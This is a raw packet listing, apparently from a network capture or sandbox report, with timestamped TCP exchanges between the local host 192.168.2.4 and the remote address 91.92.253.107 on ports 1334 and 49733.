Sep 5, 2024 20:25:31.645442009 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.645448923 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.645461082 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.645479918 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.645514011 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.645519018 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.645529985 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.645579100 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.645623922 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.645679951 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.645737886 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.645812035 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.645838976 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.645925999 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.646049976 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646100044 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.646204948 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646214962 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646219969 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646274090 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.646338940 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646398067 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646405935 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646414042 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646423101 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646425009 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.646449089 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.646491051 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646500111 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646507025 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.646523952 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646528006 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646532059 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646541119 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646548986 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646559954 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.646574974 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646584034 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646586895 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646589994 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646598101 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646605968 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646610022 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646622896 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646624088 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.646630049 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646667004 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.646718025 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646727085 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646733999 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646743059 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646745920 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646753073 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646763086 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646779060 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.646821022 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.646902084 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646910906 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646914005 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646920919 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646929979 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646938086 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646962881 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646964073 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.646972895 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646984100 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646992922 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.646994114 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.647001028 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647010088 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647012949 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647015095 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.647022009 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647038937 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.647038937 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647049904 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647052050 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.647058964 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647063017 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.647092104 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647094965 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.647102118 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647109985 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647119045 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647123098 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647130966 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647177935 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.647461891 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647473097 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647480965 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.647525072 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651020050 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651045084 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651077032 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651089907 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651135921 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651169062 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651177883 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651185989 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651209116 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651227951 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651237965 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651238918 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651259899 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651268959 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651283026 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651288986 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651316881 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651330948 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651340008 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651346922 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651360989 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651379108 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651412010 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651412964 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651422977 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651432991 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651441097 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651442051 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651451111 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651459932 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651459932 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651468992 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651489973 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651535034 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651580095 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651588917 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651597977 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651606083 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651614904 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651623964 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651633024 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651637077 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651643038 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651643991 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651654005 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651664972 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651676893 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651685953 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651695967 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651699066 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651701927 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651707888 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651715994 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651724100 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651726007 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651734114 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651734114 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651741982 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651751995 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651753902 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651762009 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651772022 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651801109 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651837111 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651845932 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651853085 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651860952 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651871920 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651880026 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651895046 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651930094 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.651930094 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651941061 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651948929 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651957989 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651964903 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651973009 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651978016 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651985884 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.651993990 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652002096 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652028084 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652043104 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652053118 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652055979 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652090073 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652097940 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652123928 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652134895 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652163982 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652173996 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652239084 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652247906 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652251959 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652259111 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652266979 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652290106 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652297974 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652316093 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652322054 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652333975 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652357101 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652359962 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652365923 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652396917 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652400017 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652405024 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652445078 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652466059 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652478933 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652503014 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652512074 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652553082 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652555943 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652566910 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652571917 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652615070 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652621984 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652622938 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652664900 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652688026 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652704000 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652713060 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652729988 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652741909 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652766943 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652775049 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652777910 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652796030 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652806044 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652813911 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652837038 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652899981 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652899981 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652909994 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652935028 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652942896 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652956009 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.652982950 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.652992964 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653016090 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.653042078 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653058052 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.653067112 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653153896 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653206110 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653213978 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653218985 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653280973 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653350115 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653358936 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653366089 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653431892 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653440952 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653444052 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653459072 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653563976 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653572083 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653593063 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653600931 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653614998 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653687954 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653695107 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653764009 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653887987 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.653896093 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654025078 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654099941 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654109001 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654228926 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654237986 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654244900 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654253006 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654261112 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654268980 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654325962 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654334068 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654341936 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654365063 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654373884 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654457092 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654464960 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654499054 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654508114 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654515028 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654586077 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654593945 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654602051 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654623032 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654684067 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654692888 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654699087 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654720068 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654728889 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654794931 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654804945 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654813051 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654874086 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654881954 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654889107 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654912949 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654983044 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654990911 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.654999971 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655102968 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655112028 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655118942 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655133009 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655143023 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655196905 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655282974 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655291080 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655297995 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655316114 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655324936 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655410051 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655596018 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655639887 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655647993 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655678988 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655688047 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655746937 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655755997 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655762911 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655833006 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655843019 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655849934 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655860901 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655869007 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655909061 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655953884 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655962944 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.655988932 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656063080 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656073093 CEST	1334	49733	91.92.253.107	192.168.2.4
